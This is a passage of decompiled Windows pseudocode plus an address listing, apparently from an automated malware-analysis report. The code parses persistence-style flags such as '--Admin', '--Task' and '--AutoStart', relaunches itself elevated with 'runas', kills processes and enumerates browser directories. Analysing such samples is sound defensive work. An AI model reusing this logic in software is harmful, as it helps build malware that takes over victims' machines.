													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205);
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0;
														if( *0x51a7c0 != 0) {
															_t995 = 0x51a7c0;
															_t210 =  &(_t995[1]); // 0x51a7c2
															_t1205 = _t210;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[1]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - _t1205;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, 0x51a7c0);
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
														E00413FF0(0, _t1008,  &_a228, 0);
														_t1207 = E00412900( &_v40, 0);
														_t955 = _v52 + 0x828;
														_t1276 = _t1275 + 0x18;
														__eflags = _t955 - _t1207;
														if(_t955 != _t1207) {
															__eflags = _t955[5] - 8;
															if(_t955[5] >= 8) {
																L00422587( *_t955);
																_t1276 = _t1276 + 4;
															}
															_t955[5] = 7;
															_t955[4] = 0;
															 *_t955 = 0;
															__eflags = _t1207[5] - 8;
															if(_t1207[5] >= 8) {
																 *_t955 =  *_t1207;
																 *_t1207 = 0;
															} else {
																_t839 = _t1207[4] + 1;
																__eflags = _t839;
																if(_t839 != 0) {
																	E004205A0(_t955, _t1207, _t839 + _t839);
																	_t1276 = _t1276 + 0xc;
																}
															}
															_t955[4] = _t1207[4];
															_t955[5] = _t1207[5];
															__eflags = 0;
															_t1207[5] = 7;
															_t1207[4] = 0;
															 *_t1207 = 0;
														}
														__eflags = _v12 - 8;
														if(__eflags >= 0) {
															L00422587(_v32);
															_t1276 = _t1276 + 4;
														}
														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
														_t1234 = _v40;
														_t1277 = _t1276 + 4;
														_a220 = 0xf;
														_t1208 = 0;
														__eflags = 0;
														_a216 = 0;
														_a200 = 0;
														do {
															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
															__eflags =  *_t1178;
															if( *_t1178 != 0) {
																_t1011 = _t1178;
																_t955 = _t1011 + 1;
																do {
																	_t608 =  *_t1011;
																	_t1011 = _t1011 + 1;
																	__eflags = _t608;
																} while (_t608 != 0);
																_t1012 = _t1011 - _t955;
																__eflags = _t1012;
															} else {
																_t1012 = 0;
															}
															_push(_t1012);
															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
															_t1208 = _t1208 + 1;
															__eflags = _t1208 - 0xa;
														} while (_t1208 < 0xa);
														_t1278 = _t1277 - 0x18;
														_t1014 = _t1278;
														_push(0xffffffff);
														 *(_t1014 + 0x14) = 0xf;
														 *(_t1014 + 0x10) = 0;
														 *_t1014 = 0;
														E00413FF0(0, _t1014,  &_a196, 0);
														_t1209 = E00412900( &_v48, 0);
														_t958 = _v60 + 0x840;
														_t1279 = _t1278 + 0x18;
														__eflags = _t958 - _t1209;
														if(_t958 != _t1209) {
															__eflags = _t958[5] - 8;
															if(_t958[5] >= 8) {
																L00422587( *_t958);
																_t1279 = _t1279 + 4;
															}
															_t958[5] = 7;
															_t958[4] = 0;
															 *_t958 = 0;
															__eflags = _t1209[5] - 8;
															if(_t1209[5] >= 8) {
																 *_t958 =  *_t1209;
																 *_t1209 = 0;
															} else {
																_t828 = _t1209[4] + 1;
																__eflags = _t828;
																if(_t828 != 0) {
																	E004205A0(_t958, _t1209, _t828 + _t828);
																	_t1279 = _t1279 + 0xc;
																}
															}
															_t958[4] = _t1209[4];
															_t958[5] = _t1209[5];
															__eflags = 0;
															_t1209[5] = 7;
															_t1209[4] = 0;
															 *_t1209 = 0;
														}
														__eflags = _v20 - 8;
														if(__eflags >= 0) {
															L00422587(_v40);
															_t1279 = _t1279 + 4;
														}
														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
														_t1235 = _v48;
														_t1280 = _t1279 + 4;
														_a284 = 0xf;
														_t1210 = 0;
														__eflags = 0;
														_a280 = 0;
														_a264 = 0;
														do {
															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
															__eflags =  *_t1181;
															if( *_t1181 != 0) {
																_t1017 = _t1181;
																_t958 = _t1017 + 1;
																do {
																	_t614 =  *_t1017;
																	_t1017 = _t1017 + 1;
																	__eflags = _t614;
																} while (_t614 != 0);
																_t1018 = _t1017 - _t958;
																__eflags = _t1018;
															} else {
																_t1018 = 0;
															}
															_push(_t1018);
															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
															_t1210 = _t1210 + 1;
															__eflags = _t1210 - 0xa;
														} while (_t1210 < 0xa);
														_t1281 = _t1280 - 0x18;
														_t1020 = _t1281;
														_push(0xffffffff);
														 *(_t1020 + 0x14) = 0xf;
														 *(_t1020 + 0x10) = 0;
														 *_t1020 = 0;
														E00413FF0(0, _t1020,  &_a260, 0);
														_t618 = E00412900( &_v56, 0);
														_t1236 = _v68;
														_t1211 = _t618;
														_t1282 = _t1281 + 0x18;
														_t960 = _t1236 + 0x870;
														__eflags = _t960 - _t1211;
														if(_t960 != _t1211) {
															__eflags = _t960[5] - 8;
															if(_t960[5] >= 8) {
																L00422587( *_t960);
																_t1282 = _t1282 + 4;
															}
															_t960[5] = 7;
															_t960[4] = 0;
															 *_t960 = 0;
															__eflags = _t1211[5] - 8;
															if(_t1211[5] >= 8) {
																 *_t960 =  *_t1211;
																 *_t1211 = 0;
															} else {
																_t817 = _t1211[4] + 1;
																__eflags = _t817;
																if(_t817 != 0) {
																	E004205A0(_t960, _t1211, _t817 + _t817);
																	_t1282 = _t1282 + 0xc;
																}
															}
															_t960[4] = _t1211[4];
															_t960[5] = _t1211[5];
															__eflags = 0;
															_t1211[5] = 7;
															_t1211[4] = 0;
															 *_t1211 = 0;
														}
														__eflags = _v28 - 8;
														if(_v28 >= 8) {
															L00422587(_v48);
															_t1282 = _t1282 + 4;
														}
														_push(0xb);
														_v28 = 7;
														_v32 = 0;
														_v48 = 0;
														E00415C10(_t960,  &_v48, _t1211, _t1236, L"C:\\Windows\\");
														_t1237 = _t1236 + 0x888;
														E00413580(_t960, _t1236 + 0x888,  &_v56);
														__eflags = _v40 - 8;
														if(_v40 >= 8) {
															L00422587(_v52);
															_t1282 = _t1282 + 4;
														}
														_push(0x27);
														_v32 = 7;
														_v36 = 0;
														_v52 = 0;
														E00415C10(_t960,  &_v52, _t1211, _t1237, L"C:\\Program Files (x86)\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v60);
														__eflags = _v44 - 8;
														if(_v44 >= 8) {
															L00422587(_v56);
															_t1282 = _t1282 + 4;
														}
														_push(0x29);
														_v36 = 7;
														_v40 = 0;
														_v56 = 0;
														E00415C10(_t960,  &_v56, _t1211, _t1237, L"C:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v64);
														__eflags = _v48 - 8;
														if(_v48 >= 8) {
															L00422587(_v60);
															_t1282 = _t1282 + 4;
														}
														_push(0x1e);
														_v40 = 7;
														_v44 = 0;
														_v60 = 0;
														E00415C10(_t960,  &_v60, _t1211, _t1237, L"C:\\Program Files (x86)\\Google\\");
														E00413580(_t960, _t1237,  &_v68);
														__eflags = _v52 - 8;
														if(_v52 >= 8) {
															L00422587(_v64);
															_t1282 = _t1282 + 4;
														}
														_push(0x21);
														_v44 = 7;
														_v48 = 0;
														_v64 = 0;
														E00415C10(_t960,  &_v64, _t1211, _t1237, L"C:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t960, _t1237,  &_v72);
														__eflags = _v56 - 8;
														if(_v56 >= 8) {
															L00422587(_v68);
															_t1282 = _t1282 + 4;
														}
														_push(0x23);
														_v48 = 7;
														_v52 = 0;
														_v68 = 0;
														E00415C10(_t960,  &_v68, _t1211, _t1237, L"C:\\Program Files\\Internet Explorer\\");
														E00413580(_t960, _t1237,  &_v76);
														__eflags = _v60 - 8;
														if(_v60 >= 8) {
															L00422587(_v72);
															_t1282 = _t1282 + 4;
														}
														_push(0x18);
														_v52 = 7;
														_v56 = 0;
														_v72 = 0;
														E00415C10(_t960,  &_v72, _t1211, _t1237, L"C:\\Program Files\\Google\\");
														E00413580(_t960, _t1237,  &_v80);
														__eflags = _v64 - 8;
														if(_v64 >= 8) {
															L00422587(_v76);
															_t1282 = _t1282 + 4;
														}
														E00413100( &_v76, _t1211, L"D:\\Windows\\");
														_v52 = E00415200( &_v36);
														_t353 = E00415610(_t648) + 0x880; // 0x880
														E00413580(_t960, _t353,  &_v80);
														E00413210( &_v84);
														E00413100( &_v84, _t1211, L"D:\\Program Files (x86)\\Mozilla Firefox\\");
														_t1212 = E00413920( &_v44);
														_t358 = _t1212 + 0x880; // 0x880
														_t961 = _t358;
														E00413580(_t358, _t358,  &_v88);
														E00413210( &_v92);
														E00413100( &_v92, _t1212, L"D:\\Program Files (x86)\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v96);
														E00413210( &_v100);
														E00413100( &_v100, _t1212, L"D:\\Program Files (x86)\\Google\\");
														E00413580(_t961, _t961,  &_v104);
														E00413210( &_v108);
														E00413100( &_v108, _t1212, L"D:\\Program Files\\Mozilla Firefox\\");
														E00413580(_t961, _t961,  &_v112);
														E00413210( &_v116);
														E00413100( &_v116, _t1212, L"D:\\Program Files\\Internet Explorer\\");
														E00413580(_t961, _t961,  &_v120);
														E00413210( &_v124);
														E00413100( &_v124, _t1212, L"D:\\Program Files\\Google\\");
														E00413580(_t961, _t961,  &_v128);
														E00413210( &_v132);
														_t375 = _t1212 + 0x868; // 0x868
														_t1238 = _t375;
														_t677 = E00413490(_t375, 0);
														__eflags =  *_t677 - 0x2e;
														if( *_t677 != 0x2e) {
															_t800 = E0041CDD0( &_v76, _t1238);
															_t1282 = _t1282 + 4;
															E004131D0(_t1238, _t800);
															E00413210( &_v80);
														}
														E0041C140(E00413560( &_v76), _t961);
														E00413600( &_v80);
														E0040EF50(0x50ff50,  &_v92, __eflags, 0xa);
														_t1283 = _t1282 + 4;
														E00412C20( &_a300);
														_t962 = _v92;
														_t1239 = 0;
														do {
															E00412DE0(_t1212,  *((intOrPtr*)(_t962 + _t1239 * 4)));
															_t1239 = _t1239 + 1;
															__eflags = _t1239 - 0xa;
														} while (_t1239 < 0xa);
														_v8 = 0x100;
														GetUserNameW( &_a388,  &_v8);
														E00413930( &_v76);
														_t1284 = _t1283 - 0x18;
														E00412C40(_t1284, _t1212, "|");
														_t1285 = _t1284 - 0x18;
														E00412BF0(_t1285,  &_a300);
														E0040ECB0( &_v84);
														_t1286 = _t1285 + 0x30;
														_v100 =  *((intOrPtr*)(E0041C410( &_v84,  &_v96)));
														_t697 = E0041C450( &_v104, E0041C420( &_v88,  &_v96));
														__eflags = _t697;
														if(_t697 != 0) {
															do {
																_t782 = E00412F40(E0041C430( &_v88));
																_t1290 = _t1286 - 0x18;
																E00412C40(_t1290, _t1212, _t782);
																_t784 = E00412900( &_v8, 0);
																_t400 = _t1212 + 0x880; // 0x880
																E00413580(_t962, _t400, _t784);
																E00413210( &_v12);
																_t788 = E00413100( &_a96, _t1212,  &_a380);
																_t789 = E00413100( &_v16, _t1212, L"%username%");
																_t405 = _t1212 + 0x880; // 0x880
																_t1239 = _t789;
																_t790 = E00413660(_t405);
																_t406 = _t1212 + 0x880; // 0x880
																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
																_t1286 = _t1290 + 0x1c;
																E00413210( &_v24);
																E00413210( &_a84);
																E0041C440( &_v108);
																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
																__eflags = _t799;
															} while (_t799 != 0);
														}
														_t414 = _t1212 + 0x880; // 0x880
														E004136C0(_t414,  &_a204);
														E0040CA70(_t962,  &_v36, _t1212, _t1239);
														_t416 = _t1212 + 0x850; // 0x850
														E004130B0(_t1286 - 0x18, _t416);
														E0040C740();
														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
														E0041BA10(_a4);
														_t707 = E0041BA80(_a4);
														__eflags = _t707;
														if(_t707 != 0) {
															 *(_t1212 + 0x8c0) = 0;
															 *_t1212 =  *0x51323c;
															E00413560( &_v4);
															E00410A50( &_v4);
															E0041C140(E00413560( &_v32),  &_v4);
															E00413600( &_v36);
															E00413100( &_v36, _t1212, L"F:\\");
															E00413580(_t962,  &_v12,  &_v40);
															E00413210( &_v44);
															E00413640( &_v16,  &_v100);
															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
															__eflags = _t723;
															if(_t723 != 0) {
																_t966 = _v48;
																do {
																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
																	L214();
																	_t770 = E0041C2F0();
																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
																	_t1239 = _t770;
																	E0041B8B0(_t966, _t1239, _t966);
																	_t773 = E004134B0(E0041C470( &_v100));
																	_t441 = _t1239 + 0x8a4; // 0x8a4
																	E00413260(_t441, _t1212, _t773);
																	 *((char*)(_t1239 + 0x8e0)) = 1;
																	E0041FA10(E0041C3D0(), _t1239);
																	E004138D0( &_v108);
																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
																	__eflags = _t780;
																} while (_t780 != 0);
															}
															 *0x529238 =  *0x51323c;
															E0041FDC0(0x529238);
															_t727 = GetMessageW( &_a272, 0, 0, 0);
															__eflags = _t727;
															if(_t727 != 0) {
																do {
																	TranslateMessage( &_a276);
																	DispatchMessageW( &_a276);
																	_t765 = GetMessageW( &_a276, 0, 0, 0);
																	__eflags = _t765;
																} while (_t765 != 0);
															}
															_t728 =  *0x513250;
															__eflags = _t728;
															if(_t728 != 0) {
																PostThreadMessageW(_t728, 0x12, 0, 0);
																do {
																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t754;
																	if(_t754 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t759;
																		} while (_t759 != 0);
																	}
																	_t755 = WaitForSingleObject( *0x513240, 0xa);
																	__eflags = _t755 - 0x102;
																} while (_t755 == 0x102);
															}
															_t729 =  *0x51324c;
															__eflags = _t729;
															if(_t729 != 0) {
																PostThreadMessageW(_t729, 0x12, 0, 0);
																do {
																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
																	__eflags = _t746;
																	if(_t746 != 0) {
																		do {
																			DispatchMessageW( &_a104);
																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
																			__eflags = _t751;
																		} while (_t751 != 0);
																	}
																	_t747 = WaitForSingleObject( *0x513248, 0xa);
																	__eflags = _t747 - 0x102;
																} while (_t747 == 0x102);
															}
															__eflags =  *0x513234;
															_t730 =  *0x513230;
															if( *0x513234 == 0) {
																_t730 =  *0x513238;
															}
															__eflags = _t730;
															if(_t730 != 0) {
																CloseHandle(_t730);
															}
															_t1242 = _a284;
															E00413600( &_v4);
														} else {
															_t1242 = 0;
														}
														E004139D0( &_v76);
														E00412D50( &_a304);
														E00412D50( &_a228);
														E00412D50( &_a156);
														E00412D50( &_a180);
													} else {
														_t1242 = 0;
													}
													E00412D50( &_a252);
												} else {
													_t868 = GetVersion();
													__eflags = _t868 - 5;
													if(_t868 <= 5) {
														goto L60;
													} else {
														lstrcpyW( &_a968, L"--Admin");
														lstrcatW( &_a968, L" IsNotAutoStart");
														lstrcatW( &_a968, L" IsNotTask");
														E0042B420( &_a400, 0, 0x38);
														_a396.cbSize = 0x3c;
														_a412 =  &_a3248;
														_t1268 = _t1268 + 0xc;
														_a400 = 0;
														_a416 =  &_a968;
														_t879 = _t1230 + 0x10;
														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
															_t879 =  *_t879;
														}
														_a420 = _t879;
														_a424 = 5;
														_a408 = L"runas";
														_t881 = ShellExecuteExW( &_a396); // executed
														__eflags = _t881;
														if(_t881 == 0) {
															L61:
															_t581 = _a16;
															goto L62;
														} else {
															_t1242 = 0;
														}
													}
												}
											}
										}
									}
									E00413210( &_a204);
									E00413210( &_a132);
									E00412D50( &_a56);
									E00413B10( &_a44);
									return _t1242;
								} else {
									__eflags = 0;
									E00413B10( &_a116);
									return 0;
								}
							} else {
								_t1145 = _a28;
								_v12 = _t1145 + 0x14;
								_t968 = _t1145 + 0xc;
								_a24 = _t1145 + 0x10;
								while(1) {
									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
									_t1264 = _t1264 + 8;
									__eflags = _t895;
									_t896 = _a28;
									if(_t895 != 0) {
										goto L17;
									}
									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
									__eflags = lstrcmpW(L"IsTask",  *_t968);
									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
									 *0x513235 = 1;
									_t1201 = _t1201 + 2;
									_a24 =  &(_a24[2]);
									_t968 =  &(_t968[2]);
									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
									_t923 =  &(_v12[2]);
									L25:
									_a24 =  &(_a24[1]);
									_t1201 = _t1201 + 1;
									_t968 =  &(_t968[1]);
									_v12 =  &(_t923[1]);
									__eflags = _t1201 - _a36;
									if(_t1201 < _a36) {
										_t1145 = _a28;
										continue;
									} else {
										goto L26;
									}
									goto L235;
									L17:
									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
									_t1264 = _t1264 + 8;
									__eflags = _t897;
									_t898 = _a28;
									if(_t897 != 0) {
										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
										_t1264 = _t1264 + 8;
										__eflags = _t899;
										if(_t899 != 0) {
											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
											_t1264 = _t1264 + 8;
											__eflags = _t901;
											if(_t901 != 0) {
												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
												_t1264 = _t1264 + 8;
												__eflags = _t903;
												if(_t903 == 0) {
													_t969 = _a28;
													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
													_a40 = _t1248;
													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
													while(1) {
														_t1220 = OpenProcess(0x100000, 0, _t1248);
														__eflags = _t1220;
														if(_t1220 == 0) {
															break;
														}
														_t916 = WaitForSingleObject(_t1220, 0x1f4);
														_t917 = CloseHandle(_t1220);
														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
															break;
														} else {
															_t919 = E00411AB0();
															__eflags = _t919;
															if(_t919 != 0) {
																GlobalFree(_t969);
																__eflags = 0;
																E00413B10( &_a116);
																return 0;
															} else {
																Sleep(1);
																_t1248 = _a40;
																continue;
															}
														}
														goto L235;
													}
													E00411CD0(_t969, 0, 0);
													 *0x529224 = 0;
													_t1249 = GetCurrentProcess();
													_a40 = 0;
													GetExitCodeProcess(_t1249,  &_a40);
													TerminateProcess(_t1249, _a40);
													CloseHandle(_t1249);
													__eflags = 0;
													E00413B10( &_a116);
													return 0; // executed
												} else {
													goto L24;
												}
											} else {
												_a20 = 1;
												goto L24;
											}
										} else {
											_a32 = 1;
											L24:
											_t923 = _v12;
											goto L25;
										}
									} else {
										 *0x513234 = 1;
										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
										lstrcpyW(0x521cf0,  *_t968);
										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
										__eflags = lstrcmpW(L"IsTask",  *_v12);
										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
										_a24 =  &(_a24[4]);
										_t1201 = _t1201 + 4;
										_t968 =  &(_t968[4]);
										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
										_t923 =  &(_v12[4]);
										goto L25;
									}
									goto L235;
								}
							}
						}
					}
				} else {
					E004124E0();
					return 0;
				}
				L235:
			}

0x00419f93
0x00419f9b
0x00419fa3
0x00419fa5
0x00419fa6
0x00419fab
0x00419fb2
0x00419fc4
0x00419fd2
0x00419fda
0x00419fe0
0x00419fe2
0x00419fe4
0x00419fe4
0x00419fe6
0x00419ff1
0x00419ff9
0x0041a005
0x0041a00a
0x0041a015
0x0041a017
0x0041a019
0x0041a01c
0x0041b669
0x0041b66e
0x00000000
0x0041a022
0x0041a02a
0x0041a030
0x0041a036
0x0041a038
0x0041a03d
0x0041a048
0x0041a04d
0x0041a058
0x0041a05a
0x0041a05c
0x0041a05f
0x0041b673
0x0041b673
0x0041b678
0x0041b67d
0x0041b67e
0x0041b67f
0x0041b680
0x0041b681
0x0041b683
0x0041b68a
0x0041b692
0x0041b697
0x0041b697
0x0041b69a
0x0041b6a4
0x0041b6ae
0x0041b6b5
0x0041b6bc
0x0041b6c4
0x0041b6c9
0x0041b6c9
0x0041b6ce
0x0041b6d8
0x0041b6e2
0x0041b6e9
0x0041b6ef
0x0041b6f1
0x0041b6fa
0x0041b705
0x0041b70a
0x0041b70d
0x0041b717
0x0041b721
0x0041b721
0x0041b72b
0x0041b731
0x0041b733
0x0041b73c
0x0041b747
0x0041b74c
0x0041b74f
0x0041b759
0x0041b763
0x0041b763
0x0041b76d
0x0041b773
0x0041b775
0x0041b77e
0x0041b789
0x0041b78e
0x0041b791
0x0041b79b
0x0041b7a5
0x0041b7a5
0x0041b7af
0x0041b7b6
0x0041b7be
0x0041b7c3
0x0041b7c3
0x0041b7c8
0x0041b7d2
0x0041b7dc
0x0041b7e3
0x0041b7ea
0x0041b7f2
0x0041b7f7
0x0041b7f7
0x0041b7fc
0x0041b806
0x0041b810
0x0041b817
0x0041b81e
0x0041b826
0x0041b82b
0x0041b82b
0x0041b830
0x0041b83a
0x0041b844
0x0041b84b
0x0041b852
0x0041b85a
0x0041b85f
0x0041b85f
0x0041b864
0x0041b86e
0x0041b878
0x0041b87f
0x0041b883
0x0041b888
0x0041b88d
0x0041b890
0x0041b897
0x0041b899
0x0041b8a0
0x0041b8a5
0x0041a065
0x0041a06d
0x0041a073
0x0041a079
0x0041a07b
0x0041a08f
0x0041a099
0x0041a09d
0x0041a09f
0x0041a0a3
0x0041a0a7
0x0041a0ac
0x0041a0bb
0x0041a0c2
0x0041a0c8
0x0041a0ce
0x0041a0e7
0x0041a0f3
0x0041a0fb
0x0041a100
0x0041a10a
0x0041a10c
0x0041a10e
0x0041a112
0x0041a116
0x0041a11b
0x0041a11b
0x0041a11e
0x0041a120
0x0041a127
0x0041a130
0x0041a13b
0x0041a13b
0x0041a140
0x0041a148
0x0041a151
0x0041a156
0x0041a156
0x0041a159
0x0041a16d
0x0041a173
0x0041a181
0x0041a187
0x0041a18c
0x0041a190
0x0041a33d
0x0041a341
0x0041a347
0x0041a34e
0x0041a45c
0x0041a461
0x0041a354
0x0041a359
0x0041a359
0x0041a464
0x0041a48a
0x0041a48f
0x0041a493
0x0041a496
0x0041a4a1
0x0041a4a1
0x0041a4a3
0x0041a4ae
0x0041a4b6
0x0041a4b6
0x0041a4b9
0x0041a4bc
0x0041a4c2
0x0041a4c7
0x0041a4d0
0x0041a4d0
0x0041a4d2
0x0041a4d3
0x0041a4d3
0x0041a4d7
0x0041a4d7
0x0041a4be
0x0041a4be
0x0041a4be
0x0041a4db
0x0041a4e4
0x0041a4e9
0x0041a4ea
0x0041a4ea
0x0041a4ef
0x0041a4fe
0x0041a506
0x0041a50c
0x0041a51b
0x0041a529
0x0041a531
0x0041a538
0x0041a547
0x0041a553
0x0041a55e
0x0041a563
0x0041a567
0x0041a56a
0x0041a56e
0x0041a570
0x0041a6ea
0x0041a6ea
0x0041a576
0x0041a576
0x0041a578
0x00000000
0x0041a57e
0x0041a580
0x0041a588
0x0041a58b
0x0041a59b
0x0041a5a4
0x0041a5af
0x0041a5b2
0x0041a5b6
0x0041a5b8
0x0041a5bf
0x0041a5c7
0x0041a5cf
0x0041a5d6
0x0041a5db
0x0041a5de
0x0041a5e3
0x0041a5e9
0x0041a5ee
0x0041a5ee
0x0041a5f1
0x0041a5f1
0x0041a578
0x0041a5f5
0x0041a602
0x0041a6f9
0x0041a6f9
0x00000000
0x0041a608
0x0041a608
0x0041a60a
0x0041a702
0x0041a702
0x0041a709
0x00000000
0x0041a70f
0x0041a70f
0x0041a711
0x0041a717
0x0041a719
0x0041a72a
0x0041a72f
0x0041a733
0x0041a736
0x0041a741
0x0041a741
0x0041a743
0x0041a74e
0x0041a752
0x0041a752
0x0041a755
0x0041a758
0x0041a75e
0x0041a760
0x0041a763
0x0041a763
0x0041a765
0x0041a766
0x0041a766
0x0041a76a
0x0041a76a
0x0041a75a
0x0041a75a
0x0041a75a
0x0041a76c
0x0041a775
0x0041a77a
0x0041a77b
0x0041a77b
0x0041a784
0x0041a788
0x0041a78e
0x0041a790
0x0041a792
0x0041a797
0x0041a797
0x0041a7bb
0x0041a7c1
0x0041a7c9
0x0041a7ce
0x0041a7d4
0x0041a7d9
0x0041a7d9
0x0041a7ce
0x0041a719
0x0041a7e7
0x0041a7ec
0x0041a7ef
0x0041a7ef
0x0041a7f1
0x0041a7f1
0x0041a7f9
0x0041a803
0x0041a813
0x0041a819
0x0041a81e
0x0041a82f
0x0041a83b
0x0041a841
0x0041a842
0x0041a842
0x0041a852
0x0041a854
0x0041a85b
0x0041a87a
0x0041a886
0x0041a88c
0x0041a895
0x0041a89a
0x0041a89a
0x0041a8af
0x0041a8af
0x00000000
0x0041a610
0x0041a610
0x0041a612
0x00000000
0x0041a618
0x0041a618
0x0041a61e
0x0041a8b6
0x0041a8c5
0x0041a8ca
0x0041a8d5
0x0041a8da
0x0041a8de
0x0041a8e1
0x0041a8ec
0x0041a8ec
0x0041a8ee
0x0041a8f9
0x0041a901
0x0041a901
0x0041a904
0x0041a907
0x0041a90d
0x0041a90f
0x0041a912
0x0041a912
0x0041a914
0x0041a915
0x0041a915
0x0041a919
0x0041a919
0x0041a909
0x0041a909
0x0041a909
0x0041a91b
0x0041a924
0x0041a929
0x0041a92a
0x0041a92a
0x0041a92f
0x0041a932
0x0041a93a
0x0041a93c
0x0041a944
0x0041a94b
0x0041a952
0x0041a955
0x0041a95c
0x0041a962
0x0041a967
0x0041a967
0x0041a970
0x0041a970
0x0041a973
0x0041a976
0x0041a976
0x0041a97b
0x0041a97b
0x0041a97d
0x0041a95e
0x0041a95e
0x0041a95e
0x0041a97f
0x0041a987
0x0041a992
0x0041a997
0x0041a99a
0x0041a99e
0x0041a9a0
0x0041a9a0
0x0041a9a6
0x0041a9ab
0x0041a9b0
0x0041a9b4
0x0041a9ba
0x0041a9bf
0x0041a9bf
0x0041a9c6
0x0041a9cc
0x0041a9cf
0x0041a9d8
0x0041a9dd
0x0041a9df
